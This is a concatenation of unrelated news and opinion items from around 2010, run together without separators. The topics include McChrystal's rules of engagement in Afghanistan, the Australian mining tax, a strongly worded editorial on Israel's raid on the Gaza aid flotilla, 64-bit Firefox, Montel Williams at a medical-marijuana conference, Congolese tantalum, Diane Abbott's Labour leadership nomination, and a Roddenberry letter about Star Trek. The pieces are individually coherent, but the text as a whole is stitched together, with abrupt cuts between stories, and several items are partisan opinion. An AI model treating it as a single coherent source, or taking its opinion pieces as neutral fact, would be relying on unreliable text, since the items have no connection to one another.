It ’s “ insurgent math , ” as he calls it – for every innocent person you kill , you create 10 new enemies .
He has ordered convoys to curtail their reckless driving , put restrictions on the use of air power and severely limited night raids .
He regularly apologizes to Hamid Karzai when civilians are killed , and berates commanders responsible for civilian deaths .
“ For a while , ” says one U.S. official , “ the most dangerous place to be in Afghanistan was in front of McChrystal after a ‘ civ cas ’ incident . ”
The ISAF command has even discussed ways to make not killing into something you can win an award for :
There ’s talk of creating a new medal for “ courageous restraint , ” a buzzword that ’s unlikely to gain much traction in the gung - ho culture of the U.S. military .
But however strategic they may be , McChrystal ’s new marching orders have caused an intense backlash among his own troops .
Being told to hold their fire , soldiers complain , puts them in greater danger .
“ Bottom line ? ” says a former Special Forces operator who has spent years in Iraq and Afghanistan .
“ I would love to kick McChrystal in the nuts .
His rules of engagement put soldiers ’ lives in even greater danger .
Every real soldier will tell you the same thing . ”
In March , McChrystal traveled to Combat Outpost JFM – a small encampment on the outskirts of Kandahar – to confront such accusations from the troops directly .
It was a typically bold move by the general .
Only two days earlier , he had received an e-mail from Israel Arroyo , a 25 - year - old staff sergeant who asked McChrystal to go on a mission with his unit .
“ I am writing because it was said you do n’t care about the troops and have made it harder to defend ourselves , ” Arroyo wrote .
Within hours , McChrystal responded personally : “ I ’m saddened by the accusation that I do n’t care about soldiers , as it is something I suspect any soldier takes both personally and professionally – at least I do .
But I know perceptions depend upon your perspective at the time , and I respect that every soldier ’s view is his own . ”
Then he showed up at Arroyo ’s outpost and went on a foot patrol with the troops – not some bullshit photo - op stroll through a market , but a real live operation in a dangerous war zone .
A few days after that foot patrol , one of the soldiers in Arroyo ’s outpost was killed while out on patrol and McChrystal returned for a meeting with the troops that turned into a very tense encounter with soldiers who are not happy with the rules of engagement :
Chrystal and his team show up the next day .
Underneath a tent , the general has a 45 - minute discussion with some two dozen soldiers .
The atmosphere is tense .
“ I ask you what ’s going on in your world , and I think it ’s important for you all to understand the big picture as well , ” McChrystal begins .
“ How ’s the company doing ?
You guys feeling sorry for yourselves ?
Anybody ?
Anybody feel like you ’re losing ? ” McChrystal says .
“ Sir , some of the guys here , sir , think we ’re losing , sir , ” says Hicks .
McChrystal nods .
“ Strength is leading when you just do n’t want to lead , ” he tells the men .
“ You ’re leading by example .
That ’s what we do .
Particularly when it ’s really , really hard , and it hurts inside . ”
Then he spends 20 minutes talking about counterinsurgency , diagramming his concepts and principles on a whiteboard .
He makes COIN seem like common sense , but he ’s careful not to bullshit the men .
“ We are knee - deep in the decisive year , ” he tells them .
The Taliban , he insists , no longer has the initiative – “ but I do n’t think we do , either . ”
It ’s similar to the talk he gave in Paris , but it ’s not winning any hearts and minds among the soldiers .
“ This is the philosophical part that works with think tanks , ” McChrystal tries to joke .
“ But it does n’t get the same reception from infantry companies . ”
During the question - and - answer period , the frustration boils over .
The soldiers complain about not being allowed to use lethal force , about watching insurgents they detain be freed for lack of evidence .
They want to be able to fight – like they did in Iraq , like they had in Afghanistan before McChrystal .
“ We are n’t putting fear into the Taliban , ” one soldier says .
“ Winning hearts and minds in COIN is a coldblooded thing , ” McChrystal says , citing an oft - repeated maxim that you ca n’t kill your way out of Afghanistan .
“ The Russians killed 1 million Afghans , and that did n’t work . ” (…)
As the discussion ends , McChrystal seems to sense that he has n’t succeeded at easing the men ’s anger .
He makes one last - ditch effort to reach them , acknowledging the death of Cpl. Ingram .
“ There ’s no way I can make that easier , ” he tells them .
“ No way I can pretend it wo n’t hurt .
No way I can tell you not to feel that .
. . .
I will tell you , you ’re doing a great job .
Do n’t let the frustration get to you . ”
The session ends with no clapping , and no real resolution .
McChrystal may have sold President Obama on counterinsurgency , but many of his own men are n’t buying it .
One has to imagine that these attitudes are not limited to just this unit , but represent a fairly good picture of how many of the combat troops in Afghanistan feel at this point .
While we will be focused for most of today on the fate of one man , perhaps it ’s time we started asking ourselves how our current strategy in Afghanistan can possibly succeed if the troops on the ground do n’t think it will work .
I do n’t have any information about this series of photos .
I found them on a Russian - language website .
From what is visible from the picture , it does look like pythons eating a kangaroo , from the arms and the tail .
and both speices are native to Austrailia , so it seems real .
Open Letter to Paul Krugman
Tweet
Dear Prof. Krugman :
In your May 14 blog - post “ Why Libertarianism Does n’t Work , Part N ” you attempt to tar libertarianism as being an ideology that “ requires incorruptible politicians . ”
You ’re deeply confused .
One foundation of libertarianism is the observation that no profession is as infested with corruption as is politics .
The political ideology dependent upon politicians being wise and saintly is n’t libertarianism but , rather , your own – namely , “ Progressivism . ”
You and your ilk unceasingly plead for politicians to be entrusted with ever - more power and money , while libertarians – understanding that politicians are n’t the saints that you presume them to be – oppose your efforts .
Your accusing libertarianism of requiring “ incorruptible politicians ” makes as much sense as a faith - healer accusing science - based medicine of requiring flawlessly effective witch - doctors .
Sincerely ,
Donald J. Boudreaux
( Here ’s David Boaz ’s response to Krugman . HT Colin77 )
Comments
WASHINGTON  President Obama will soon expand the rights of gay workers by allowing them to take family and medical leave to care for sick or newborn children of same - sex partners , administration officials said Monday .
The policy will be set forth in a ruling to be issued Wednesday by the Labor Department ’s wage and hour division , the officials said .
Under a 1993 law , people who work for a company with 50 or more employees are generally entitled to 12 weeks of unpaid leave to care for a newborn or for a spouse , son or daughter with “ a serious health condition . ”
The new ruling indicates that an employee in a same - sex relationship can qualify for leave to care for the child of his or her partner , even if the worker has not legally adopted the child .
Red earth and rising taxes
MINING , as both the firms doing it in Australia and the government would acknowledge , is the goose that laid the golden egg .
But the two camps have sharply divergent views of the government 's proposed new tax on it : it is either an innocent egg - collecting operation or a vicious goose - killer .
The so - called Resource Super - Profits Tax ( RSPT ) would be levied from 2012 on mining profits above a “ normal ” rate of return ( defined as the ten - year government bond yield , currently below 6 % ) , at the stiff rate of 40 % .
After details of the proposed tax were unveiled a month ago , the boss of at least one huge global mining firm was reportedly livid .
Mick Davis , chief executive of Xstrata , called the tax the “ biggest assault on the mining industry I have witnessed . ”
Rio Tinto's Tom Albanese also chipped in , branding Australia his “ number one ” sovereign risk , ahead of several countries not known for their stability , including Guinea and Mongolia .
Wayne Swan , Australia 's finance minister , has returned fire .
He argues that miners have reaped huge profits from selling Australia 's very soil to China but are not paying the Australian people their due in taxes .
Worse , the miners have created a two - speed economy riven with “ dutch disease ” .
He calls the miners ' campaign against the tax “ fundamentally dishonest ” in that it uses “ hysterical ” numbers for the purpose of “ massive ” and “ grievous ” misrepresentation .
He also chides them for amassing a public - relations war chest of A$ 100 m ( $ 84 m ) — an indication , in his view , of their determination to distort the government 's noble intentions .
A vast array of numbers about the RSPT are indeed being put around , few of which are uncontested .
When the tax was unveiled Mr Swan claimed that mining companies only pay 13 - 17 % of their profits in tax .
The miners quickly pointed out that this figure is drawn from a draft academic study from the University of North Carolina which compared only corporate taxes , while neglecting royalties , payroll taxes and the like .
Australia 's Treasury retaliated with its own hasty calculations which coincidentally also settled on a figure of 17 % .
The mining giants do not deny that they have profited handsomely from high commodity prices but do dispute that figure .
BHP Billiton says it has paid an overall tax rate of 43 % over the past few years ; Rio Tinto says its has averaged over 35 % during the past decade .
Analysis from Citigroup backs up these claims .
The bank calculates that miners have paid nearly 35 % , including royalties , over the past five years , making the industry one of the most heavily taxed in Australia .
The miners say that the RSPT could push rates to nearly 60 % , making Australia 's mining taxes the world 's most burdensome by some distance .
Naturally the government disagrees , pointing to the hefty tax breaks that miners already enjoy .
It says that as profits have exploded the share of them paid in taxes has tumbled .
It also accuses the mining industry of warping the local economy .
The high interest rates needed to curb the mining boom , it says , have strengthened the currency , hurting other exports .
It intends to use some of the revenues from the RSPT to fund a cut of a couple of percentage points in the general corporation tax , in an effort to boost other Australian businesses and thus rebalance the economy .
Mining companies say the so - called distortion is in fact a strength .
They point to a report from Deloitte that contends that mining helped shield Australia from recession last year , when the economies of most rich countries contracted .
They insist the tax will massively dent future investment .
That is thanks not only to the increase in the rate itself , they say , but also to its application to existing mines , which will make investors nervous about possible future changes to the tax regime .
Xstrata shelved planned spending of A$ 6.6 billion on June 3rd ; other firms say they are also trimming investment and reviewing projects .
With an election due within a year Australia 's government undoubtedly calculated that picking a fight with miners , which it characterises as greedy foreigners siphoning off Australian resources for a pittance , would play well with the electorate .
It may have misjudged both the fury of the miners and voters ' disquiet .
Public opinion is evenly split on the tax , even though some of the proceeds will go to pension funds .
To win public backing the government has commissioned a series of television adverts set to begin airing on June 6th .
To pay for them it was forced to declare a “ national emergency ” to circumvent rules on using public cash for political advertising .
It reckons that the high quality of its mineral deposits and its reputation for stability leaves the miners with little option but to stay put .
But Canada , and even Zambia , have said they spy an opportunity to win investment away from Australia — a national emergency indeed , if true .
Israel ’s massacre at sea
3 June 2010
The Israeli military ’s killing of nine civilians and wounding of scores more on a ship carrying humanitarian supplies in international waters was an act of cold - blooded murder and a war crime .
For millions of people around the world , this military assault on an aid convoy carrying wheelchairs , cement , water purification systems , children ’s toys and notebook paper to Gaza — all items barred by Israel ’s blockade of the occupied territory — epitomizes the role played by Israel , as well as that of its US sponsor , in global affairs .
As always in the aftermath of such atrocities , the Israeli government has blamed its victims .
In a televised speech Wednesday , Prime Minister Benyamin Netanyahu described the aid convoy as a “ flotilla of terror supporters ” and praised the slaughter on the high seas as an act of self - defense by besieged Israeli commandos .
Those who engaged in self - defense were the passengers on the ship , and they had every right to do so .
The fact that nine of them were killed , while the Israel Defense Force ( IDF ) commandos suffered not a single fatality , is evidence as to who was the aggressor .
This is a regular pattern .
The massacre in the Mediterranean comes just a year and a half after Operation Cast Lead , the far greater slaughter that the Israeli regime unleashed against the suffering people of Gaza .
Claiming then as now to act in “ self defense , ” in December 2008 and January 2009 Israel rained bombs , missiles and tank and automatic weapons fire upon Gaza , killing over 1,400 Palestinians , the overwhelming majority of them unarmed men , women and children .
This one - sided war by one of the world ’s most powerful military machines against a relatively defenseless civilian population claimed just 13 Israeli lives , all but three of them soldiers .
The aid convoy was a response to the barbaric blockade that has subjected an entire population of 1.5 million people in Gaza to hunger , disease and misery .
Since the tightening of the blockade in 2007 , according to the UN Relief and Works Agency ( UNRWA ) , the number of Gazan refugees living in abject poverty has tripled .
The UN reported at the end of 2009 that " insufficient food and medicine is reaching Gazans , producing a further deterioration of the mental and physical health of the entire civilian population since Israel launched Operation Cast Lead against the territory . "
Among the starkest expressions of Israel ’s deliberate starvation of an entire population was a finding by the Food and Agriculture Organization last year that 65 percent of babies between the ages of nine and 12 months suffer from anemia .
Israel is able to carry out this kind of medieval siege as well as piracy and murder not merely because of its own military might , but thanks to the unwavering patronage and funding of Washington .
This latest mass killing has only underscored that — as with so much else — the advent of the Obama administration has effected no significant change in US policy .
While issuing a hypocritical expression of “ deep regret at the loss of life , ” the Obama administration is doing everything it can to assure that Israel bears neither blame nor consequences for these killings .
It quashed any criticism of Israel ’s action at the UN Security Council and has implicitly adopted the Zionist state ’s justification for the massacre .
Israel ’s criminality and Washington ’s role as its unconditional enabler both have a long history .
It is worth recalling another Israeli attack on a vessel in international waters that took place 43 years ago .
In that attack , 34 sailors aboard the USS Liberty were killed by Israeli napalm , missiles and machine - gun fire , while another 171 while wounded — the worst casualties suffered by the US Navy in a hostile action since World War II .
An intelligence ship , the Liberty was attacked off the Sinai Peninsula on June 8 , 1967 in the midst of the Six - Day War .
While Israel called it a tragic “ mistake , ” ample evidence emerged that the Zionist state attacked the ship because it wanted to stop Washington from listening in to its communications .
Intercepts flatly contradicted Tel Aviv ’s claim that it was acting in self - defense and revealed that Israel wanted to conceal evidence of its aggressive intentions as it moved to seize Gaza , the West Bank and the Golan Heights , all of which remain under illegal occupation to this day .
Much of the criticism of this week ’s attack on the aid convoy , including within Israel itself , has treated it as a “ botched ” operation , an excessive use of force and a public relations fiasco .
But this is not a matter of a government losing its head .
The Netanyahu regime ’s policies are directed to a definite socio-political base , composed of religious extremists , right - wing settlers and the most politically reactionary layers within Israeli society .
Its orientation is personified by the fascistic background and ideology of its foreign minister , Avigdor Lieberman .
Deeply reactionary and in deep political crisis , the Israeli government is driven more and more to act as a global pyromaniac , threatening renewed wars against Syria and Lebanon and , according to a report in the London Times this week , sending submarines armed with nuclear missiles to the waters off Iran .
The unconditional support and approximately $ 3 billion in annual aid to Israel bestowed by Washington — and continued under Obama — pose a mortal danger to people across the globe .
This is not a matter merely of a single outlaw regime , but of a general descent of world affairs into a state of criminality and the disintegration of any semblance of international law , with Israel ’s main patron setting the pattern .
The Obama administration continues two wars of aggression initiated under Bush and has maintained intact a police state apparatus of unlawful detentions , rendition and torture .
It has now earned the ignominious designation as the number one practitioner of “ targeted killings ” — assassinations — through CIA drone attacks that have killed “ many hundreds of people ” in Pakistan , according to a United Nations report released Wednesday .
The report condemned Washington for claiming a “ license to kill without accountability . ”
The behavior of the US and other governments as if they were the state incarnation of Murder Inc. , acts of state terrorism and piracy like that committed by Israel this week , and the constant threats of new aggression have created a global climate that bears ever closer resemblance to the conditions that prevailed on the eve the Second World War .
These developments are driven by the mortal crisis of world capitalism and will not be reversed by either protests or pacifism .
Only by uniting the working class , including both Jewish and Arab workers in the Middle East , in a common struggle to put an end to the profit system can a new global conflagration be prevented .
Bill Van Auken
Bill Van Auken
I 've always struggled with the idea that a news piece is the best way to tell a science story .
Sure , it 's a tried and tested format for virtually any topic under the sun , but news reports ( short , sharp , pithy ) are the direct opposite of what scientists have to do when reporting their work ( cautious , conservative , laden with caveats ) .
For me this has always left behind a residual guilt whenever I cover a major story .
The complexity of modern science has n't helped that guilt factor – there might be a dozen potentially interesting lines in a research paper but we can only ever cover one or two in a news article .
The infinite space of the web has helped , of course , by allowing for more detailed reporting , linking to source documents and the ability for readers to comment on how something has been written up .
But longer stories are not the best answer , because they still do n't reflect how scientific research is done .
Any scientist knows that a paper can only ever be an interim point in the study of a topic and , on publication , it will immediately be dissected and analysed by other researchers all over the world .
Readers who are scientists and other interested people might pick up on some of this discussion but , unless you 're steeped in a subject , you might miss out .
After the first headlines and news stories summarising the research and instant reaction to it , a casually interested reader might hear nothing about a topic until the next big splashy news story .
Where would you go for that extra analysis ?
And how would you know what is worth reading ?
We 're trying out a completely new way of covering big science stories .
We believe our coverage of a major research paper should not be done - and - dusted with a single story but form part of a continuum .
By tracking reactions and analysis from scientists and bloggers over the days and weeks after a news story breaks , we think the coverage of the story will be richer , more informed and more comprehensive .
Our " story trackers " , as we have dubbed them , will allow us to show the wider implications of a piece of research and perhaps follow up the many lines of inquiry that we had to leave out of the original news piece , for whatever reason .
Today 's autism research in Nature and our story reporting it seem an ideal testing ground for this concept .
We will need your help to make this work .
If you 're a blogger , a scientist or just an interested citizen , point us to the best and worst follow - ups you see of the Nature paper .
Every day , we will update the tracker with links to the latest reactions and analysis .
If you 've been involved in the research and have something to say that you have n't seen reported elsewhere , pipe up .
If you 're a blogger with an interesting analysis of your own , email us and we 'll send readers to your article .
Feel free to tell us if you think anything is wrong with our analysis or that of the people we 're linking to .
You can email us directly ( guardianscience@gmail.com ) or leave a comment on the tracker itself .
This is very much a work in progress and we 're unlikely to get everything right first time .
Your comments , thoughts and criticisms are all , of course , most welcome .
UPDATE : The Alpha preview of 64 - bit ( x64 ) Firefox 4.0 for Windows 7 ( Firefox - 3.7a5pre.en-US.win64-x86_64 ) is available for download - read about it here .
64 - bit ( x64 ) architectures are the future , and already well on their way to becoming mainstream and burying 32 - bit ( x64 ) .
Microsoft was one of the first companies to recognize the trend and adapt products such as Windows XP , and then Windows Vista , Windows 7 and Office 2010 to the general trend in the evolution of processors .
In fact , the software giant is already producing x64 exclusive software with Windows Server 2008 R2 and beyond , for example .
Users currently running the 64 - bit flavor of Windows 7 will soon be able to install a 64 - bit version of Firefox offered officially by Mozilla .
In a platform meeting on May 25th , 2010 , Mozilla indicated that it had been gearing up to produce the first x64 builds of Firefox tailored to Windows 7 by the end of this week .
Mozilla ’s Armen Zambrano Gasparian revealed that , “ Once the builds start working ( I almost have them ) they will show up in ” the Latest Trunk download section .
Early adopters will , of course , be able to download x64 Firefox releases and run them on 64 - bit Windows 7 .
Of course , users of Windows 7 already have a 64 - bit browser at their disposal .
The latest iteration of the Windows client comes with Internet Explorer 8 ( 64 - bit ) out of the box .
However , as customers undoubtedly are aware , the default browser for Windows 7 is the 32 - bit version of IE8 , despite the fact that the operating system features the x64 flavor .
The reason for this is rather simple .
64 - bit browsers do n’t really enjoy support across the board for the time being .
One illustrative example in this regard is that Adobe is n’t providing a x64 version of Flash to integrate with x64 Internet Explorer 8 .
The same is valid for Firefox .
Users of x64
Firefox wo n’t have a release of the Adobe Flash plugin to integrate with their browser , severely impacting the user experience on websites such as YouTube , for example .
Obviously , a 64 - bit ( x64 ) version of Mozilla ’s open source browser will only be delivered in the future .
Firefox 4.0 is currently cooking , with the promise of a Beta development milestone available as early as the coming month .
Still , ahead of the Firefox 4.0 Beta planned for June 2010 , Mozilla is looking to offer early adopters at least one more Developer Preview to test - drive .
Keep your eyes on Softpedia and I ’ll provide and update when Mozilla offers x64 Firefox for Windows 7 .
Firefox 3.7 Alpha 4 / Mozilla Developer Preview of Gecko 1.9.3 Alpha 4 for Windows is available here .
Firefox 3.7 Alpha 4 / Mozilla Developer Preview of Gecko 1.9.3 Alpha 4 for Mac OS X is available here .
Firefox 3.7 Alpha 4 / Mozilla Developer Preview of Gecko 1.9.3 Alpha 4 for Linux is available here .
Firefox 3.6.3 for Windows is available for download here .
Firefox 3.6.3 for Mac OS X is available for download here .
Firefox 3.6.3 for Linux is available for download here .
Follow me on Twitter @ MariusOiaga .
You could have your choice of any city in the country .
Chicago 's larger and a short drive away .
Heck , Kansas City 's economy is doing better .
And let 's not even talk about cities along either of the coveted coasts !
Why do you stay in St. Louis ?
Well , because you realize St. Louis is a soulful , elegant , fun , interesting , eclectic place poised for great things .
You like its grit , its neighborhoods ' character , its street festivals , its parks , its food , its nightlife , its affordability .
Or something along those lines .
In fact , you should probably put it in your own words here , at the new microblog dedicated to this very question :
The submit button is located in the yellow box in the left tab - - it 's the mail slot icon .
I 'm absolutely thrilled to announce that , next week , I 'll be among those who can actually submit " why I stay " there in St. Louis .
Because I 'm coming home , for good .
More on that soon .
Recognizing Skin Cancer Can Save Your Life
A picture may be worth a thousand words , and now it may also save your life .
Viewing images of skin cancer — the most common form of cancer in the United States — prompted people to examine their own skin for signs of the malady more frequently and more precisely , according to a review of studies published in 2013 in the Journal of the American Academy of Dermatology .
" Visual images capture our attention and are persuasive , " says study coauthor Laurie Hoffman - Goetz , PhD , professor emerita in the School of Public Health and Health Systems at the University of Waterloo in Ontario , Canada , in a university news release .
" They also help us to learn and remember . "
Researchers hope this proactive response to skin cancer images will help to promote early detection .
" Incorporating images into clinical practice when educating patients can be a powerful tool in the fight against skin cancer , " Dr. Hoffman - Goetz adds .
Click through to learn how to recognize skin cancer .
Additional reporting by Ingrid Strauch .
Montel Williams spoke at yesterday ’s medical marijuana conference in Maine .
In tears as he shared his pain with the audience , he was encouraged by one attending Sheriff to take his medicine , prompting Montel to light up a joint and take a few puffs .
There have been a number of questions surrounding medical marijuana dispensaries in the state , since the new law was passed in November .
Marijuana Medical Hand ... [ " Gieringer Ph.D. , Dale Best Price : $ 0.93 Buy New $ 2.99 ( as of 11:50 EST - Details )
At the convention in Portland nearly 250 people came out to hear the ins and outs of the law , and learn how they can get involved in growing or selling medical marijuana reported wchs6.com .
Television host Montel Williams was the keynote speaker .
Suffering from multiple sclerosis , Williams has been an advocate for the uses of marijuana for medical patients .
Williams uses marijuana to help ease symptoms of multiple sclerosis including the chronic nerve pain and said " people like him should n’t be treated as criminals for using marijuana for pain control for a variety of diseases and conditions . "
The conference was held to attempt to answer questions about what the law means for patients , health care providers , municipalities , law enforcement agencies and others .
A long time advocate of medicinal marijuana use , Montel Williams has worked diligently in his efforts to provide a face and voice to the debate on the medical use of this illegal herb .
He spoke at the conference about Maine ’s new law allowing medical marijuana dispensaries yesterday at the University of Southern Maine in hopes that he could be a voice for patients and caregivers who are often not heard in these public debates and conferences around the country on the legality and validity of the use of this form of medication .
When Williams pain level became so intolerable he was in tears , Cumberland County Sheriff Mark Dion shouted from the audience " why do n’t you just take your medicine " , the audience applauded and stood as Montel sat down , pulled out a marijuana cigarette and fired it up , lighting up the approval meter of the attendee ’s present .
Montel said his pain level dropped tremendously and if not for the use of the drug he would n’t have been able to bear the nerve pain he was enduring prior to and while on stage speaking to the citizens of Maine .
Read the rest of the article
June 9 , 2010
You can join the fight to protect clean water and defend wetlands .
Become a Member
Our Work Healthy
Gulf is committed to uniting and empowering people to protect and restore
the natural resources of the Gulf Region .
Protecting
Water Because everyone deserves clean water .
Defending
Wetlands
Because wetlands are a defense against storms and provide ecological value for people and wildlife .
Conserving
Marine Life Because the creatures in the Gulf deserve a voice .
Sustaining
Coastal
Communities Because people deserve safe , resilient communities .
Resisting
Dirty Energy
Because our best shot at overcoming climate change is a just transition to renewable energy .
How We Protect the Gulf 01 MONITOR
We review state and federal permits and monitor industrial activity by land , air , and sea .
02 REPORT
We report pollution and environmental inconsistencies to the appropriate agencies .
03 ALERT
We alert the media , agencies , and our membership about threats to the Gulf South .
04 ORGANIZE
We organize our members and partners to develop a unified plan to protect the Gulf region .
05 ACT
We take action to protect water and defend wetlands for people and wildlife .
Tantalum , a refractory metal , is an exceedingly rare mineral , mostly mined in Australia .
It ’s used in the creation of tantalum capacitors , an extremely reliable sort of capacitor , which means you can find it in many of the most high - profile electronic devices , including those from Apple and Intel .
Though the majority of the world ’s tantalum mining takes place in Australia , the Congo is , according to the Enough Project , home to about a fifth of the world ’s known tantalum supply .
The Congo is also home to one of the bloodiest , ugliest , and most horrifying conflicts on the planet , and has been for years .
Death toll estimates are well into the millions , as much as 45,000 per month by 2007 .
A group calling itself the Enough Project has taken it upon themselves to try to alleviate the situation in the Congo through protests here at home .
By purchasing Congolese tantalum , the Enough Project says , American corporations are indirectly financing the Congolese warlords and terrorist groups , including the FDLR , who perpetuate the killing .
Manufacturers like Apple and Intel claim they do not use tantalum from the Congo , citing assurances from their suppliers .
But the Enough Project says this is not a reliable source , and that these companies are neglecting to check the supply at smelters due to cost concerns .
The Enough Project says estimates within the industry put the added cost to consumers at around a penny per unit ( note : I do not have supplemental evidence to support this claim ) .
Here ’s a narrative from the Enough Project showing how tantalum goes from these areas to your iPhone .
WIth the release of the iPhone 4 , likely the biggest or second - biggest ( after the iPad ) gadget launch of the year , the Enough Project is mobilizing .
They ’ve organized protests outside Apple ’s new store in Washington , they ’ve gotten an op-ed in the New York Times from columnist Nicholas Kristof , and they ’ve gotten a few actors to create an “ I ’m a Mac / I ’m a PC ” parody ( starring Joshua Malina , who I am forever unable to see as anybody but Will Bailey from The West Wing ) .
Backbench MP
Diane Abbott has got through to the Labour leadership ballot after a rival lent her his support .
David Miliband joined MPs nominating her on Wednesday to ensure she reached the threshold of 33 by the deadline .
Ms Abbott , who was also nominated by Jack Straw , said it was a response to a " huge surge " of emails by party members demanding a wider choice .
She will face former cabinet ministers Ed Balls , Andy Burnham and David and Ed Miliband in the three - month contest .
' Huge surge '
Labour members , trade union members , MPs and MEPs will be balloted and the result announced on 25 September .
Until Wednesday morning Ms Abbott had only 11 nominations - well short of the number required to get on the ballot paper .
However her bid was boosted when fellow left - wing MP John McDonnell withdrew from the race , saying he wanted to help her get through .
It was tight , but we did it Diane Abbott Profile : Diane Abbott
Mr Miliband then said he would give her his support and encouraged others to do so - she has also been supported by acting party leader Harriet Harman , who said she wanted to see a woman in the contest .
Ms Abbott denied it was " patronising " to be helped onto the ballot by Mr Miliband , adding : " There 's been a huge surge of letters and emails from party members saying that they wanted a diverse group of people running in this leadership contest and I think David Miliband and others responded to the feelings of the membership . "
" There is nothing artificial about the party 's and public 's interest in my candidacy , " she told the BBC News channel , adding that she expected to win backing " from across the party " once the contest got under way for real .
' Authentic strand '
She also told the BBC she had always been " quietly confident " she would get into the ballot - as there was a lot of support for not having " a panel of leadership candidates who all looked the same " .
" It was tight , but we did it , " she said .
Her success was welcomed by her fellow candidates .
David Miliband said he had been " determined " to help Ms Abbott make it into the contest proper as she represented an " authentic strand " of opinion within the party .
" It 's time to turn the page from Blair and Brown - all the candidates believe that Ed Miliband
" It is not tokenistic , " he said of her candidacy .
" She has 20 years of experience and commitment .
It is right she is on the ballot "
He said all the contenders must be ambassadors for Labour and be willing to engage in " dialogue and debate " not fight among themselves .
Ed Miliband told BBC News : " I think we need the widest possible contest and I am pleased that Diane is on the ballot . "
But he said it was now time the contenders " stopped talking to themselves " and got on with making their case to the party membership .
' Too technocratic '
According to pre-released extracts of a speech he will give tomorrow , the former energy secretary will say it is time to " turn the page from Blair and Brown " and say there has been a " culture in our party that stifled dissent and debate " .
He will say the contest is about " who can really move us on from a politics that was too technocratic and managerial and stopped inspiring , to one rooted in our values , more optimistic about the change we can make happen " .
Andy Burnham , who also only made it over the vote threshold in the last few hours of nominations , said the Parliamentary Labour Party had " worked in a pragmatic way to get a lot of people on to the ballot paper " and Ms Abbott 's presence would " liven up " the contest .
Commenting as nominations closed , acting Labour leader Harriet Harman said the leadership contest would be " open , engaging and energising " .
She said four million people were expected to vote in the contest , which would be " the biggest and most widespread election of any political party or any organisation in this country " .
The leader is chosen by an electoral college system made up of three sections - Labour MPs and MEPs , party members and members of affiliated unions and other affiliated organisations .
People are balloted individually in each of the three sections , with the results from each making up a third of the final result .
Voting will take place between 16 August and 22 September and the winner will be announced on the first day of the party 's conference in Manchester on 25 September .
In 1969 , despite the best efforts of its cast , crew and unrelenting fanbase , the original Star Trek television series was cancelled by NBC after 79 episodes due to supposedly poor ratings .
In the following letter , written in 1973 to a lady named Judy Thomases , the show ’s creator – Gene Roddenberry – praises the show ’s fans , admits to giving Spock a ‘ slight look of the devil ’ in order to please the show ’s female audience , and speaks of his desire to see the show revived .
A fascinating read .
A scan of the first page can be seen below , followed by a transcript of the entire letter .
Transcript
Warner Bros .
Television
A WARNER COMMUNICATIONS COMPANY
4300 Warner Boulevard
Burbank , California 91505
( 213 ) 843-6000
March 8 , 1973
Miss Judy Thomases
25 Woodland Road
New City , New York 10956
Dear Miss Thomases :
Forgive my delay in answering your last letter .
Yes , my schedule has been very tight with two television movie - pilots on their way .
Let me answer your questions in the order you layed them our :
a . The profile of our fans run anything but typical .
They range from grammar school children to university presidents and astronauts .
I think the one thing that characterizes all of them no matter whatever their age is youth .
It is important to the typical STAR TREK fan that there is a tomorrow .
Also , I think they pretty much share the STAR TREK philosophies about life , the fact it is wrong to interfere in the evolvement of other peoples , that to be different is not necessarily to be wrong or ugly .
b. Fans are involved in all sorts of activities and I think the fans themselves can give better answers to this than I can .
c. Yes .
The main unprecedented thing is that they are interested mainly in the ideas promoted by STAR TREK rather than in a usual fan thing of merely having a crush for some particular actor .
d. STAR TREK fans are generally anything but silly .
As answered above they range broadly in age and social status .
Over the years we ’ve learned a great respect for them and are particularly delighted when some aspect of STAR TREK has been important in their lives such as incouraging them to continue their education or learn to participate fully in the world about them or believe in the dignity and value of life everywhere
e. No .
f. Answered above .
They are interested in ideas in the show , and what it tries to say .
g. STAR TREK says that it has not all happened , it has not all been discovered , that tomorrow can be as challenging and adventurous as any time man has ever lived .
I think also it is interesting that STAR TREK came along at a time that the nation was becoming deeply involved in Vietnam and STAR TREK very strongly spoke against this by dramatically illustrating why it is wrong to interfere with other people , why other cultures can be equal and better to leave alone , why it is wrong to kill for any reason what - so - ever .
h. Yes .
We did think Spock became very interesting to fans , I did purposely give him a slight look of the ‘ devil ’ because I thought that might be particularly provocative to women , particularly when his nature contrasted so greatly to this .
I ’ll take credit for formulating Spock and guiding the character , then give as much credit to Leonard Nimoy for making it work , and also credit to the writers who kept it going in many story situations .
Answering your questions in paragraph 3 :
a. I think I ’ve given STAR TREK ’S main message above .
b . It did not have a sufficiently high audience rating in regards numbers of people .
Later when they went to another demographic system of rating audience by its purchasing power they discovered that STAR TREK was much superior to most other shows .
This , obviously , is important in commerical television where the whole point of the thing is to reach people who can buy the products that are advertised .
However , by the time they began measuring under that system the following year , STAR TREK had already been cancelled .
If STAR TREK were on the air today with the same demographics , it would stay on the air as most shows are now trying to achieve STAR TREK’S audience profile which is considered rather ideal .
c. I withdrew from the show during the 3rd year in an effort to force NBC to give us a better time slot and better treatment .
d. STAR TREK had no ‘ magic formula ’ unless you consider respect for the audience and hard work a formula .
It has been my opinion for years that science fiction , like any other story , should be mainly about people with hardware being secondary .
It seems to me the networks and stations have wasted a lot of money seeking some mysterious formula in STAR TREK when really you make your science fiction the same way you make any other good story and there are no shortcuts .
e. I would love to see STAR TREK revived under the proper conditions .
All of us who worked on the show have a great affection for it .
However , I am only a partial owner of STAR TREK which is also owned by Paramount and NBC .
Paramount owns the copyright to it and the ultimate decision is really in their lap .
They refer to their existing STAR TREK episodes being re-run as their “ 79 Jewels ” and of course they think twice before putting a new one on if it would destroy the value of the ones they already have .
I do n’t think it would , but this so far has been fear of their business people .
Sincerely yours ,
( Signed )
Gene Roddenberry
Gibraltar Bows before the Tax Cartel
The international tax system just became a little less competitive .
Gibraltar has removed the distinction between onshore and tax - exempt offshore businesses in an effort to remove the nation ’s reputation as a tax haven and become a “ mainstream European financial services centre . ”
The state has signed 18 tax information exchange agreements and has others under negotiation .
With the adoption of the Act , coupled with Gibraltar ’s compliance with all EU financial services regulation , money laundering and co-operation rules , Gibraltar joins the group of mainstream European financial services centres , according to a government statement .
The Act introduces tough anti-avoidance measures and default financial and legal penalties to help ensure everyone based in the tiny state pay the taxes .
…
Many previously tax exempt banks , insurance , investment , gaming and other companies will begin to pay profit tax in Gibraltar for the first time on the same basis as all other companies starting in July 2011 .
Gibraltar is still an attractive place to start a business : company tax rates will be cut from 22 % to 10 % as the new rules are introduced , and its English common law system is about the best available in the current uncompetitive market for law .
Still , this is an indication of what happens when powerful nations work together to thwart competition .
